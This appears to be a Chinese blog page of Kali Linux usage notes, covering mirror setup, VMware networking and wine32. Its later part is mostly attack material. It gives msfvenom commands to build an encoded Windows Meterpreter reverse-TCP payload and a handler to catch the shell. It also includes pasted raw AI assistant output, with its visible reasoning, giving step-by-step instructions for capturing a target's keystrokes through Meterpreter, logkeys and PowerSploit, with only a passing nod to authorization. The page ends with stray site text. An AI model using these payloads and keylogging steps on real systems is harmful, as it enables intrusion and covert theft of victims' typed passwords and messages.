kali使用记录

1.更新源:

中科大源:

步骤

vi  /etc/apt/sources.list

 

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

然后保存退出 wq!

之后执行:

apt-get update && apt-get upgrade && apt-get dist-upgrade

apt-get clean #删除以下载的包

reboot #重新启动

2.Vmware workstation 安装虚拟机(kali,windows等无法上网)

现象:kali无法获取  IPV4 的地址

          windows 可以获取IPV4地址,但是现实网络未连接。

问题原因:在宿主机器上,适配器有其他的链接(VPN或者是Bluetooth连接),但是该连接无法上网。

解决办法:vmware workstation 的 编辑->虚拟网络编辑器->选择类型(桥接,NAT等),桥接到,由自由改成选择对应的适配器。

 

 

3.kali linux 64位上安装32位的wine

 

在终端下输入
dpkg --add-architecture i386

apt-get update

apt-get install wine32

安装会有一个error提示 提示使用apt-get update来修复,那就继续输入apt-get update

apt-get install wine32

OK

4.设置meterpreter

 1.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shigata_ga_nai LHOST=  LPORT= -f exe  > root/1/1.exe

 2.use exploit/multi/handler

 3.set payload widnows/meterpreter/reverse_tcp

5. 使用set payload  windows/meterpreter/reverse_tcp  提示 payload is not valid

解决办法:

输入  reload_all

原因:

not all modules are reloaded

<think>好的,我现在需要帮用户解决在Kali Linux中设置和获取键盘记录的问题。首先,我得回忆一下用户提供的引用内容,看看有没有相关的信息。引用[2]提到在Meterpreter中使用Explore/Log Keystrokes菜单来记录键盘动作,这可能是一个方法。引用[4]里提到了Get-Keystrokes模块,这应该属于PowerSploit或类似的工具。 Kali Linux常用的键盘记录方法可能有几种:使用Metasploit的Meterpreter模块,或者专门的工具如logkeys,或者通过社会工程学工具包。用户可能需要具体的步骤,所以得一步步说明。 首先,Metasploit的方法。用户需要生成一个Payload,然后设置监听。启动msfconsole,搜索相关的模块,比如exploit/multi/handler,设置Payload为windows/meterpreter/reverse_tcp,然后设置LHOST和LPORT。执行exploit后,一旦目标机运行Payload,就能获得Meterpreter会话。然后使用keyscan_start开始记录,keyscan_dump查看记录,最后keyscan_stop停止。这部分在引用[2]和[4]中有提到。 另外,logkeys是一个Linux下的键盘记录工具,安装可能用apt-get,然后配置启动。不过需要注意权限问题,可能需要root权限。 社会工程学工具包(SET)可能也有键盘记录功能,用户可以通过钓鱼攻击诱使目标执行恶意脚本,进而记录键盘输入。这可能涉及到创建恶意文件或网站,然后诱导用户点击。 还要考虑法律和道德问题,用户是否有合法授权进行这些操作。另外,防病毒软件可能会检测到这些工具,所以可能需要免杀处理。 用户可能需要具体的命令示例,比如如何生成Payload,如何配置msfconsole,以及如何启动logkeys服务。同时,引用[3]提到设置LHOST,这在Metasploit中是必须的步骤,需要确保IP正确。 总结步骤:Metasploit的Meterpreter方法、logkeys工具、SET工具包。每个方法的具体操作流程,命令示例,以及注意事项。最后提醒合法使用,引用相关的内容支持步骤的正确性。</think>在Kali Linux中实现键盘记录主要有以下方法,需注意操作需在合法授权范围内进行: ### 一、使用Metasploit的Meterpreter模块 1. **生成Payload** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.101 LPORT=4444 -f exe > payload.exe ``` 需替换`LHOST`为Kali的IP(如引用[3]的设置)[^3] 2. **启动监听** ```bash msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.200.101 set LPORT 4444 exploit ``` 3. **键盘记录操作** 获取会话后执行: ```bash keyscan_start # 开始记录 keyscan_dump # 查看记录内容 keyscan_stop # 停止记录 ``` 对应引用[2]中提到的Log Keystrokes功能[^2] ### 二、使用logkeys工具 1. 安装与配置: ```bash sudo apt install logkeys sudo logkeys --start --output /var/log/keylog.log ``` 2. 查看记录: ```bash tail -f /var/log/keylog.log ``` ### 三、通过PowerSploit模块 如引用[4]所述,可结合Mimikatz模块: ```powershell Get-Keystrokes -LogPath C:\key.log ``` 需通过渗透手段在目标系统执行该命令[^4]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值